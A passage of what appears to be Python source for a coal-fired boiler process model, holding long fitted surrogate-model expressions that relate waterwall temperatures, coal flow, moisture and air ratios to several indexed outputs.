-7.27122e+07 * exp(b.mf_H2O_coal_raw[t]) \
+121.792 * b.wall_temperature_waterwall[t, 6]**2 \
-17167.1 * b.flowrate_coal_raw[t]**2 \
-0.00511324 * b.wall_temperature_waterwall[t, 1]**3 \
-0.0481974 * b.wall_temperature_waterwall[t, 6]**3 \
+74.4938 * b.flowrate_coal_raw[t]**3 \
-0.919796 * b.wall_temperature_waterwall[t, 1]*b.wall_temperature_waterwall[t, 8] \
+0.0606529 * b.wall_temperature_waterwall[t, 1]*b.wall_temperature_waterwall[t, 10] \
-46.0797 * b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t] \
-0.499405 * b.wall_temperature_waterwall[t, 2]*b.wall_temperature_waterwall[t, 5] \
-181.556 * b.wall_temperature_waterwall[t, 2]*b.ratio_PA2coal[t] \
+116.97 * b.wall_temperature_waterwall[t, 3]*b.SR[t] \
+0.393401 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_waterwall[t, 6] \
+0.675614 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_waterwall[t, 10] \
-753.901 * b.wall_temperature_waterwall[t, 4]*b.SR[t] \
-2042.45 * b.wall_temperature_waterwall[t, 4]*b.SR_lf[t] \
+2.15852 * b.wall_temperature_waterwall[t, 4]*b.secondary_air_inlet.temperature[t] \
-0.224207 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 8] \
+0.275077 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 10] \
-620.705 * b.wall_temperature_waterwall[t, 5]*b.SR[t] \
-99.9039 * b.wall_temperature_waterwall[t, 6]*b.flowrate_coal_raw[t] \
-14.5881 * b.wall_temperature_waterwall[t, 8]*b.flowrate_coal_raw[t] \
-534.118 * b.wall_temperature_waterwall[t, 9]*b.SR[t] \
-1.31088 * b.wall_temperature_waterwall[t, 10]*b.wall_temperature_waterwall[t, 12] \
-1.41959 * b.wall_temperature_waterwall[t, 11]*b.flowrate_coal_raw[t] \
+177.07 * b.wall_temperature_waterwall[t, 11]*b.ratio_PA2coal[t] \
+0.753534 * b.wall_temperature_platen[t]*b.flowrate_coal_raw[t] \
+7.17536 * b.wall_temperature_roof[t]*b.flowrate_coal_raw[t] \
+1.88795 * b.wall_temperature_roof[t]*b.secondary_air_inlet.temperature[t] \
-83.1177 * b.wall_temperature_roof[t]*b.ratio_PA2coal[t] \
-796480 * b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t] \
-1.00571e+06 * b.flowrate_coal_raw[t]*b.SR[t] \
+101563 * b.flowrate_coal_raw[t]*b.SR_lf[t] \
+662.665 * b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-12441.5 * b.flowrate_coal_raw[t]*b.ratio_PA2coal[t] \
+1.61179e+07 * b.mf_H2O_coal_raw[t]*b.SR[t] \
-11495.5 * b.mf_H2O_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
+8.29731e+06 * b.SR[t]*b.SR_lf[t] \
+6537.87 * b.SR[t]*b.secondary_air_inlet.temperature[t] \
+160251 * b.SR[t]*b.ratio_PA2coal[t] \
-9390.64 * b.SR_lf[t]*b.secondary_air_inlet.temperature[t] \
-957.772 * b.secondary_air_inlet.temperature[t]*b.ratio_PA2coal[t] \
+0.000819586 * (b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t])**2 \
+0.00102671 * (b.wall_temperature_waterwall[t, 6]*b.flowrate_coal_raw[t])**2 \
-2.36557e-06 * (b.wall_temperature_waterwall[t, 7]*b.flowrate_coal_raw[t])**2 \
+37045.4 * (b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t])**2 \
+3479.38 * (b.flowrate_coal_raw[t]*b.SR[t])**2 \
-0.00390226 * (b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t])**2)",
7: "(353.147 * b.wall_temperature_waterwall[t, 1] \
+944.788 * b.wall_temperature_waterwall[t, 2] \
-715.67 * b.wall_temperature_waterwall[t, 3] \
-113.773 * b.wall_temperature_waterwall[t, 4] \
+1714.33 * b.wall_temperature_waterwall[t, 5] \
+1186.75 * b.wall_temperature_waterwall[t, 6] \
-41011.8 * b.wall_temperature_waterwall[t, 7] \
+2313.62 * b.wall_temperature_waterwall[t, 8] \
+1044.74 * b.wall_temperature_waterwall[t, 9] \
-193.394 * b.wall_temperature_waterwall[t, 10] \
-1258.23 * b.wall_temperature_waterwall[t, 11] \
+971.027 * b.wall_temperature_waterwall[t, 12] \
+1359.51 * b.wall_temperature_platen[t] \
-694.308 * b.wall_temperature_roof[t] \
+1.69143e+06 * b.flowrate_coal_raw[t] \
-1.14413e+07 * b.mf_H2O_coal_raw[t] \
+8.24903e+06 * b.SR[t] \
-157814 * b.SR_lf[t] \
+2768.6 * b.secondary_air_inlet.temperature[t] \
+477829 * b.ratio_PA2coal[t] \
+146588 * log(b.wall_temperature_waterwall[t, 1]) \
+581939 * log(b.wall_temperature_waterwall[t, 3]) \
-224896 * log(b.wall_temperature_waterwall[t, 4]) \
-1.10027e+06 * log(b.wall_temperature_waterwall[t, 8]) \
-785548 * log(b.wall_temperature_platen[t]) \
+2.17579e+06 * log(b.flowrate_coal_raw[t]) \
-254748 * log(b.mf_H2O_coal_raw[t]) \
-2.27807e+07 * log(b.SR[t]) \
+59.8201 * b.wall_temperature_waterwall[t, 7]**2 \
-13890.7 * b.flowrate_coal_raw[t]**2 \
-3.2383e+07 * b.mf_H2O_coal_raw[t]**2 \
-0.0319362 * b.wall_temperature_waterwall[t, 7]**3 \
+52.1526 * b.flowrate_coal_raw[t]**3 \
-0.830502 * b.wall_temperature_waterwall[t, 1]*b.wall_temperature_waterwall[t, 8] \
+0.226652 * b.wall_temperature_waterwall[t, 1]*b.wall_temperature_waterwall[t, 10] \
-76.2281 * b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t] \
+779.831 * b.wall_temperature_waterwall[t, 1]*b.SR_lf[t] \
-0.348643 * b.wall_temperature_waterwall[t, 2]*b.wall_temperature_waterwall[t, 5] \
-196.262 * b.wall_temperature_waterwall[t, 2]*b.ratio_PA2coal[t] \
+127.532 * b.wall_temperature_waterwall[t, 3]*b.SR[t] \
+0.125889 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_waterwall[t, 6] \
-0.214732 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_waterwall[t, 8] \
+0.810439 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_waterwall[t, 10] \
-698.238 * b.wall_temperature_waterwall[t, 4]*b.SR[t] \
+1.85785 * b.wall_temperature_waterwall[t, 4]*b.secondary_air_inlet.temperature[t] \
-0.436732 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 8] \
+0.407706 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 10] \
-4.17827 * b.wall_temperature_waterwall[t, 5]*b.flowrate_coal_raw[t] \
-703.956 * b.wall_temperature_waterwall[t, 5]*b.SR[t] \
-0.85661 * b.wall_temperature_waterwall[t, 6]*b.wall_temperature_waterwall[t, 12] \
-9.60464 * b.wall_temperature_waterwall[t, 6]*b.flowrate_coal_raw[t] \
-34.2924 * b.wall_temperature_waterwall[t, 7]*b.flowrate_coal_raw[t] \
+1107.63 * b.wall_temperature_waterwall[t, 7]*b.mf_H2O_coal_raw[t] \
+1.26848 * b.wall_temperature_waterwall[t, 8]*b.wall_temperature_waterwall[t, 11] \
-17.4004 * b.wall_temperature_waterwall[t, 8]*b.flowrate_coal_raw[t] \
-658.546 * b.wall_temperature_waterwall[t, 9]*b.SR[t] \
-1.01075 * b.wall_temperature_waterwall[t, 10]*b.wall_temperature_waterwall[t, 12] \
-2.06046 * b.wall_temperature_waterwall[t, 11]*b.flowrate_coal_raw[t] \
+177.497 * b.wall_temperature_waterwall[t, 11]*b.ratio_PA2coal[t] \
+52.1763 * b.wall_temperature_waterwall[t, 12]*b.flowrate_coal_raw[t] \
+0.450986 * b.wall_temperature_platen[t]*b.flowrate_coal_raw[t] \
+7.72431 * b.wall_temperature_roof[t]*b.flowrate_coal_raw[t] \
+1.57739 * b.wall_temperature_roof[t]*b.secondary_air_inlet.temperature[t] \
-173.703 * b.wall_temperature_roof[t]*b.ratio_PA2coal[t] \
-718200 * b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t] \
-942875 * b.flowrate_coal_raw[t]*b.SR[t] \
+175527 * b.flowrate_coal_raw[t]*b.SR_lf[t] \
+441.476 * b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-10706.6 * b.flowrate_coal_raw[t]*b.ratio_PA2coal[t] \
+1.62442e+07 * b.mf_H2O_coal_raw[t]*b.SR[t] \
-8678.04 * b.mf_H2O_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
+5.56242e+06 * b.SR[t]*b.SR_lf[t] \
+7113.57 * b.SR[t]*b.secondary_air_inlet.temperature[t] \
-9979.24 * b.SR_lf[t]*b.secondary_air_inlet.temperature[t] \
-650.626 * b.secondary_air_inlet.temperature[t]*b.ratio_PA2coal[t] \
+0.00138792 * (b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t])**2 \
-0.00105797 * (b.wall_temperature_waterwall[t, 12]*b.flowrate_coal_raw[t])**2 \
+33941.2 * (b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t])**2 \
+2634.71 * (b.flowrate_coal_raw[t]*b.SR[t])**2)",
8: "(30738.3 * b.wall_temperature_waterwall[t, 1] \
+635.315 * b.wall_temperature_waterwall[t, 2] \
-737.628 * b.wall_temperature_waterwall[t, 3] \
+613.096 * b.wall_temperature_waterwall[t, 4] \
+1198.21 * b.wall_temperature_waterwall[t, 5] \
+28980.1 * b.wall_temperature_waterwall[t, 6] \
-86338.9 * b.wall_temperature_waterwall[t, 7] \
-16399.5 * b.wall_temperature_waterwall[t, 8] \
+1028.24 * b.wall_temperature_waterwall[t, 9] \
+288.999 * b.wall_temperature_waterwall[t, 10] \
-1919.18 * b.wall_temperature_waterwall[t, 11] \
+1183.65 * b.wall_temperature_waterwall[t, 12] \
+1613.28 * b.wall_temperature_platen[t] \
-809.056 * b.wall_temperature_roof[t] \
+1.29475e+06 * b.flowrate_coal_raw[t] \
+2.75866e+07 * b.mf_H2O_coal_raw[t] \
+6.67449e+06 * b.SR[t] \
+5.28363e+07 * b.SR_lf[t] \
-3717.86 * b.secondary_air_inlet.temperature[t] \
+385624 * b.ratio_PA2coal[t] \
-1.00557e+07 * log(b.wall_temperature_waterwall[t, 1]) \
+559241 * log(b.wall_temperature_waterwall[t, 3]) \
-1.01411e+07 * log(b.wall_temperature_waterwall[t, 6]) \
+1.14643e+07 * log(b.wall_temperature_waterwall[t, 7]) \
+9.46655e+06 * log(b.wall_temperature_waterwall[t, 8]) \
-894841 * log(b.wall_temperature_platen[t]) \
+1.54449e+06 * log(b.flowrate_coal_raw[t]) \
-122538 * log(b.mf_H2O_coal_raw[t]) \
-1.6811e+07 * log(b.SR[t]) \
-5.55471e+07 * log(b.SR_lf[t]) \
-2.83514e+06 * log(b.secondary_air_inlet.temperature[t]) \
-4.07619e+07 * exp(b.mf_H2O_coal_raw[t]) \
-10.6528 * b.wall_temperature_waterwall[t, 1]**2 \
+0.272176 * b.wall_temperature_waterwall[t, 4]**2 \
-9.34661 * b.wall_temperature_waterwall[t, 6]**2 \
+86.226 * b.wall_temperature_waterwall[t, 7]**2 \
-6869.16 * b.flowrate_coal_raw[t]**2 \
-0.0341736 * b.wall_temperature_waterwall[t, 7]**3 \
-0.908054 * b.wall_temperature_waterwall[t, 1]*b.wall_temperature_waterwall[t, 8] \
-64.9931 * b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t] \
-0.1575 * b.wall_temperature_waterwall[t, 2]*b.wall_temperature_waterwall[t, 5] \
-145.333 * b.wall_temperature_waterwall[t, 2]*b.ratio_PA2coal[t] \
+124.842 * b.wall_temperature_waterwall[t, 3]*b.SR[t] \
+0.652536 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_waterwall[t, 10] \
-697.56 * b.wall_temperature_waterwall[t, 4]*b.SR[t] \
-1290.22 * b.wall_temperature_waterwall[t, 4]*b.SR_lf[t] \
+1.54101 * b.wall_temperature_waterwall[t, 4]*b.secondary_air_inlet.temperature[t] \
-0.340243 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 8] \
+0.186733 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 10] \
+0.264209 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 12] \
-600.521 * b.wall_temperature_waterwall[t, 5]*b.SR[t] \
-1.06736 * b.wall_temperature_waterwall[t, 6]*b.wall_temperature_waterwall[t, 12] \
-8.99471 * b.wall_temperature_waterwall[t, 6]*b.flowrate_coal_raw[t] \
+2.71176 * b.wall_temperature_waterwall[t, 7]*b.flowrate_coal_raw[t] \
+0.727491 * b.wall_temperature_waterwall[t, 8]*b.wall_temperature_waterwall[t, 11] \
-50.9128 * b.wall_temperature_waterwall[t, 8]*b.flowrate_coal_raw[t] \
-666.436 * b.wall_temperature_waterwall[t, 8]*b.SR[t] \
-0.100745 * b.wall_temperature_waterwall[t, 9]*b.wall_temperature_waterwall[t, 10] \
-530.861 * b.wall_temperature_waterwall[t, 9]*b.SR[t] \
-0.824416 * b.wall_temperature_waterwall[t, 10]*b.wall_temperature_waterwall[t, 12] \
-2.53957 * b.wall_temperature_waterwall[t, 11]*b.flowrate_coal_raw[t] \
+166.069 * b.wall_temperature_waterwall[t, 11]*b.ratio_PA2coal[t] \
+0.638522 * b.wall_temperature_platen[t]*b.flowrate_coal_raw[t] \
+6.65548 * b.wall_temperature_roof[t]*b.flowrate_coal_raw[t] \
+1.65814 * b.wall_temperature_roof[t]*b.secondary_air_inlet.temperature[t] \
-132.374 * b.wall_temperature_roof[t]*b.ratio_PA2coal[t] \
-636864 * b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t] \
-703357 * b.flowrate_coal_raw[t]*b.SR[t] \
+191874 * b.flowrate_coal_raw[t]*b.SR_lf[t] \
+531.415 * b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-9232.96 * b.flowrate_coal_raw[t]*b.ratio_PA2coal[t] \
+1.59172e+07 * b.mf_H2O_coal_raw[t]*b.SR[t] \
-8594.17 * b.mf_H2O_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
+3.30615e+06 * b.SR[t]*b.SR_lf[t] \
+6573.55 * b.SR[t]*b.secondary_air_inlet.temperature[t] \
-555.335 * b.secondary_air_inlet.temperature[t]*b.ratio_PA2coal[t] \
+0.00118832 * (b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t])**2 \
+0.846319 * (b.wall_temperature_waterwall[t, 11]*b.SR_lf[t])**2 \
+28243.5 * (b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t])**2 \
-834.918 * (b.flowrate_coal_raw[t]*b.SR[t])**2 \
-0.00281944 * (b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t])**2 \
+23.2033 * (b.flowrate_coal_raw[t]*b.SR[t])**3)",
9: "(1554.78 * b.wall_temperature_waterwall[t, 1] \
+292.513 * b.wall_temperature_waterwall[t, 2] \
-686.842 * b.wall_temperature_waterwall[t, 3] \
+504.056 * b.wall_temperature_waterwall[t, 4] \
+1072 * b.wall_temperature_waterwall[t, 5] \
+33410.5 * b.wall_temperature_waterwall[t, 6] \
+52811.6 * b.wall_temperature_waterwall[t, 7] \
+2682.22 * b.wall_temperature_waterwall[t, 8] \
+59476.3 * b.wall_temperature_waterwall[t, 9] \
+1980.99 * b.wall_temperature_waterwall[t, 10] \
-418.882 * b.wall_temperature_waterwall[t, 11] \
+979.077 * b.wall_temperature_waterwall[t, 12] \
+2613.03 * b.wall_temperature_platen[t] \
-325.642 * b.wall_temperature_roof[t] \
+1.11231e+06 * b.flowrate_coal_raw[t] \
+2.63584e+07 * b.mf_H2O_coal_raw[t] \
+5.72152e+06 * b.SR[t] \
+3.15685e+08 * b.SR_lf[t] \
-6126.97 * b.secondary_air_inlet.temperature[t] \
-349285 * b.ratio_PA2coal[t] \
+417256 * log(b.wall_temperature_waterwall[t, 1]) \
+3.53244e+06 * log(b.wall_temperature_waterwall[t, 3]) \
-360670 * log(b.wall_temperature_waterwall[t, 4]) \
+4.18922e+06 * log(b.wall_temperature_waterwall[t, 5]) \
-1.17359e+07 * log(b.wall_temperature_waterwall[t, 6]) \
-1.90854e+07 * log(b.wall_temperature_waterwall[t, 7]) \
-1.19489e+06 * log(b.wall_temperature_waterwall[t, 8]) \
-1.73885e+07 * log(b.wall_temperature_waterwall[t, 9]) \
-848457 * log(b.wall_temperature_waterwall[t, 10]) \
-1.39216e+06 * log(b.wall_temperature_platen[t]) \
+20679.5 * log(b.wall_temperature_roof[t]) \
+1.18208e+06 * log(b.flowrate_coal_raw[t]) \
-138694 * log(b.mf_H2O_coal_raw[t]) \
-3.86313e+06 * log(b.SR[t]) \
-1.78945e+08 * log(b.SR_lf[t]) \
-3.73556e+07 * exp(b.mf_H2O_coal_raw[t]) \
-11.0194 * b.wall_temperature_waterwall[t, 6]**2 \
-17.719 * b.wall_temperature_waterwall[t, 7]**2 \
-26.8571 * b.wall_temperature_waterwall[t, 9]**2 \
-3871.37 * b.flowrate_coal_raw[t]**2 \
-6.88157e+07 * b.SR_lf[t]**2 \
-24.6314 * b.flowrate_coal_raw[t]**3 \
-0.898065 * b.wall_temperature_waterwall[t, 1]*b.wall_temperature_waterwall[t, 8] \
-50.8152 * b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t] \
-1.50253 * b.wall_temperature_waterwall[t, 1]*b.secondary_air_inlet.temperature[t] \
-0.176067 * b.wall_temperature_waterwall[t, 2]*b.wall_temperature_waterwall[t, 5] \
-0.045357 * b.wall_temperature_waterwall[t, 3]*b.wall_temperature_waterwall[t, 12] \
-6290.31 * b.wall_temperature_waterwall[t, 3]*b.SR[t] \
+0.0280148 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_waterwall[t, 6] \
-0.0760966 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_platen[t] \
-543.634 * b.wall_temperature_waterwall[t, 4]*b.SR[t] \
+1.55669 * b.wall_temperature_waterwall[t, 4]*b.secondary_air_inlet.temperature[t] \
-0.462604 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 8] \
+0.552709 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 10] \
-0.187582 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 11] \
+0.311448 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 12] \
-9598.22 * b.wall_temperature_waterwall[t, 5]*b.SR[t] \
-0.893275 * b.wall_temperature_waterwall[t, 6]*b.wall_temperature_waterwall[t, 12] \
-0.0718352 * b.wall_temperature_waterwall[t, 6]*b.wall_temperature_roof[t] \
-7.00461 * b.wall_temperature_waterwall[t, 6]*b.flowrate_coal_raw[t] \
-0.347099 * b.wall_temperature_waterwall[t, 7]*b.wall_temperature_waterwall[t, 10] \
+0.986772 * b.wall_temperature_waterwall[t, 7]*b.flowrate_coal_raw[t] \
+0.874394 * b.wall_temperature_waterwall[t, 8]*b.wall_temperature_waterwall[t, 11] \
-13.7583 * b.wall_temperature_waterwall[t, 8]*b.flowrate_coal_raw[t] \
-0.111941 * b.wall_temperature_waterwall[t, 9]*b.wall_temperature_waterwall[t, 10] \
-38.4122 * b.wall_temperature_waterwall[t, 9]*b.flowrate_coal_raw[t] \
-926.033 * b.wall_temperature_waterwall[t, 9]*b.SR[t] \
-0.719251 * b.wall_temperature_waterwall[t, 10]*b.wall_temperature_waterwall[t, 12] \
+0.311257 * b.wall_temperature_platen[t]*b.flowrate_coal_raw[t] \
+0.973601 * b.wall_temperature_roof[t]*b.secondary_air_inlet.temperature[t] \
-86.0127 * b.wall_temperature_roof[t]*b.ratio_PA2coal[t] \
-573877 * b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t] \
-518729 * b.flowrate_coal_raw[t]*b.SR[t] \
+177185 * b.flowrate_coal_raw[t]*b.SR_lf[t] \
+356.318 * b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-8350.35 * b.flowrate_coal_raw[t]*b.ratio_PA2coal[t] \
+1.40375e+07 * b.mf_H2O_coal_raw[t]*b.SR[t] \
-7543.82 * b.mf_H2O_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
+6147.42 * b.SR[t]*b.secondary_air_inlet.temperature[t] \
+695872 * b.SR_lf[t]*b.ratio_PA2coal[t] \
-464.964 * b.secondary_air_inlet.temperature[t]*b.ratio_PA2coal[t] \
+0.000944236 * (b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t])**2 \
+1.68544 * (b.wall_temperature_waterwall[t, 3]*b.SR[t])**2 \
+2.37726 * (b.wall_temperature_waterwall[t, 5]*b.SR[t])**2 \
-2.11316e-05 * (b.wall_temperature_waterwall[t, 11]*b.flowrate_coal_raw[t])**2 \
+23969.4 * (b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t])**2 \
-2523.54 * (b.flowrate_coal_raw[t]*b.SR[t])**2 \
+31.1715 * (b.flowrate_coal_raw[t]*b.SR[t])**3)",
10: "(1837.36 * b.wall_temperature_waterwall[t, 1] \
+729.997 * b.wall_temperature_waterwall[t, 2] \
-230.755 * b.wall_temperature_waterwall[t, 3] \
+862.309 * b.wall_temperature_waterwall[t, 4] \
-167.942 * b.wall_temperature_waterwall[t, 5] \
+2060.72 * b.wall_temperature_waterwall[t, 6] \
+47434.8 * b.wall_temperature_waterwall[t, 7] \
+2552 * b.wall_temperature_waterwall[t, 8] \
+2565.36 * b.wall_temperature_waterwall[t, 9] \
+12188 * b.wall_temperature_waterwall[t, 10] \
-383.468 * b.wall_temperature_waterwall[t, 11] \
-125.387 * b.wall_temperature_waterwall[t, 12] \
+5141.33 * b.wall_temperature_platen[t] \
-312.616 * b.wall_temperature_roof[t] \
+1.17132e+06 * b.flowrate_coal_raw[t] \
+4.60141e+07 * b.mf_H2O_coal_raw[t] \
+2.69988e+06 * b.SR[t] \
+2.93429e+08 * b.SR_lf[t] \
-7395.61 * b.secondary_air_inlet.temperature[t] \
+367885 * b.ratio_PA2coal[t] \
-112755 * log(b.wall_temperature_waterwall[t, 1]) \
-816926 * log(b.wall_temperature_waterwall[t, 4]) \
-627025 * log(b.wall_temperature_waterwall[t, 6]) \
-1.72497e+07 * log(b.wall_temperature_waterwall[t, 7]) \
-1.30207e+06 * log(b.wall_temperature_waterwall[t, 8]) \
-833056 * log(b.wall_temperature_waterwall[t, 9]) \
-2.73476e+06 * log(b.wall_temperature_platen[t]) \
+790545 * log(b.flowrate_coal_raw[t]) \
-289014 * log(b.mf_H2O_coal_raw[t]) \
-8.88643e+06 * log(b.SR[t]) \
-1.68062e+08 * log(b.SR_lf[t]) \
-5.5004e+07 * exp(b.mf_H2O_coal_raw[t]) \
-4.59464e+07 * exp(b.SR_lf[t]) \
-15.9244 * b.wall_temperature_waterwall[t, 7]**2 \
-12.4671 * b.wall_temperature_waterwall[t, 10]**2 \
-0.0548467 * b.wall_temperature_platen[t]**2 \
-3084.74 * b.flowrate_coal_raw[t]**2 \
-20.7712 * b.flowrate_coal_raw[t]**3 \
-3.52178 * b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t] \
-2.37475 * b.wall_temperature_waterwall[t, 1]*b.secondary_air_inlet.temperature[t] \
-0.208333 * b.wall_temperature_waterwall[t, 2]*b.wall_temperature_waterwall[t, 5] \
-171.455 * b.wall_temperature_waterwall[t, 2]*b.ratio_PA2coal[t] \
+306.026 * b.wall_temperature_waterwall[t, 3]*b.SR[t] \
-0.15677 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_waterwall[t, 6] \
+1.33655 * b.wall_temperature_waterwall[t, 4]*b.secondary_air_inlet.temperature[t] \
+0.485426 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 10] \
+0.374308 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 12] \
-0.828451 * b.wall_temperature_waterwall[t, 6]*b.wall_temperature_waterwall[t, 12] \
-0.180578 * b.wall_temperature_waterwall[t, 6]*b.wall_temperature_roof[t] \
-13.9066 * b.wall_temperature_waterwall[t, 8]*b.flowrate_coal_raw[t] \
-671.924 * b.wall_temperature_waterwall[t, 9]*b.SR[t] \
+0.538709 * b.wall_temperature_waterwall[t, 10]*b.wall_temperature_waterwall[t, 11] \
-56.0447 * b.wall_temperature_waterwall[t, 10]*b.flowrate_coal_raw[t] \
-712.621 * b.wall_temperature_waterwall[t, 10]*b.SR[t] \
+44.9712 * b.wall_temperature_waterwall[t, 12]*b.flowrate_coal_raw[t] \
+75.2145 * b.wall_temperature_waterwall[t, 12]*b.ratio_PA2coal[t] \
-5.25712 * b.wall_temperature_platen[t]*b.flowrate_coal_raw[t] \
+0.836281 * b.wall_temperature_roof[t]*b.secondary_air_inlet.temperature[t] \
-693841 * b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t] \
-489211 * b.flowrate_coal_raw[t]*b.SR[t] \
+199410 * b.flowrate_coal_raw[t]*b.SR_lf[t] \
+409.786 * b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-9506.34 * b.flowrate_coal_raw[t]*b.ratio_PA2coal[t] \
+1.57634e+07 * b.mf_H2O_coal_raw[t]*b.SR[t] \
-9269.71 * b.mf_H2O_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
+7874.35 * b.SR[t]*b.secondary_air_inlet.temperature[t] \
-575.815 * b.secondary_air_inlet.temperature[t]*b.ratio_PA2coal[t] \
+0.019545 * (b.wall_temperature_waterwall[t, 11]*b.ratio_PA2coal[t])**2 \
-0.000956923 * (b.wall_temperature_waterwall[t, 12]*b.flowrate_coal_raw[t])**2 \
+26897.5 * (b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t])**2 \
-3926.81 * (b.flowrate_coal_raw[t]*b.SR[t])**2 \
-6.04217e-05 * (b.wall_temperature_waterwall[t, 4]*b.SR[t])**3 \
+39.5236 * (b.flowrate_coal_raw[t]*b.SR[t])**3)",
11: "(265.482 * b.wall_temperature_waterwall[t, 1] \
+24.2531 * b.wall_temperature_waterwall[t, 2] \
-632.925 * b.wall_temperature_waterwall[t, 3] \
+114.247 * b.wall_temperature_waterwall[t, 4] \
+28.3431 * b.wall_temperature_waterwall[t, 5] \
+445.719 * b.wall_temperature_waterwall[t, 6] \
+1363.91 * b.wall_temperature_waterwall[t, 7] \
+595.684 * b.wall_temperature_waterwall[t, 8] \
+1378.1 * b.wall_temperature_waterwall[t, 9] \
+1082.57 * b.wall_temperature_waterwall[t, 10] \
+29176.4 * b.wall_temperature_waterwall[t, 11] \
+385.741 * b.wall_temperature_waterwall[t, 12] \
-9989.8 * b.wall_temperature_platen[t] \
-387.904 * b.wall_temperature_roof[t] \
+459422 * b.flowrate_coal_raw[t] \
-8.16755e+06 * b.mf_H2O_coal_raw[t] \
-2.7349e+06 * b.SR[t] \
+2.68906e+07 * b.SR_lf[t] \
-3539.12 * b.secondary_air_inlet.temperature[t] \
+341694 * b.ratio_PA2coal[t] \
+143448 * log(b.wall_temperature_waterwall[t, 1]) \
+137163 * log(b.wall_temperature_waterwall[t, 3]) \
-174890 * log(b.wall_temperature_waterwall[t, 4]) \
-283768 * log(b.wall_temperature_waterwall[t, 6]) \
-313430 * log(b.wall_temperature_waterwall[t, 7]) \
-421769 * log(b.wall_temperature_waterwall[t, 8]) \
-498950 * log(b.wall_temperature_waterwall[t, 9]) \
-628469 * log(b.wall_temperature_waterwall[t, 10]) \
-4.79246e+06 * log(b.wall_temperature_waterwall[t, 11]) \
+2.7541e+06 * log(b.wall_temperature_platen[t]) \
-30902.5 * log(b.flowrate_coal_raw[t]) \
+423000 * log(b.SR[t]) \
-2.62773e+07 * log(b.SR_lf[t]) \
-856849 * log(b.secondary_air_inlet.temperature[t]) \
-976839 * exp(b.SR_lf[t]) \
-18.8883 * b.wall_temperature_waterwall[t, 11]**2 \
-397.68 * b.flowrate_coal_raw[t]**2 \
+0.00509064 * b.wall_temperature_platen[t]**3 \
+0.000109843 * b.wall_temperature_roof[t]**3 \
-13.0398 * b.flowrate_coal_raw[t]**3 \
-7.10244e+06 * b.mf_H2O_coal_raw[t]**3 \
-0.475103 * b.wall_temperature_waterwall[t, 1]*b.wall_temperature_waterwall[t, 12] \
-1.28357 * b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t] \
+86.2882 * b.wall_temperature_waterwall[t, 1]*b.SR[t] \
+446.141 * b.wall_temperature_waterwall[t, 1]*b.SR_lf[t] \
-0.996705 * b.wall_temperature_waterwall[t, 1]*b.secondary_air_inlet.temperature[t] \
+0.0280906 * b.wall_temperature_waterwall[t, 2]*b.wall_temperature_waterwall[t, 5] \
+0.232787 * b.wall_temperature_waterwall[t, 2]*b.secondary_air_inlet.temperature[t] \
-48.0401 * b.wall_temperature_waterwall[t, 2]*b.ratio_PA2coal[t] \
+162.375 * b.wall_temperature_waterwall[t, 3]*b.SR[t] \
+297.717 * b.wall_temperature_waterwall[t, 3]*b.SR_lf[t] \
+0.232195 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_roof[t] \
+2.02509 * b.wall_temperature_waterwall[t, 4]*b.flowrate_coal_raw[t] \
+0.0771506 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 12] \
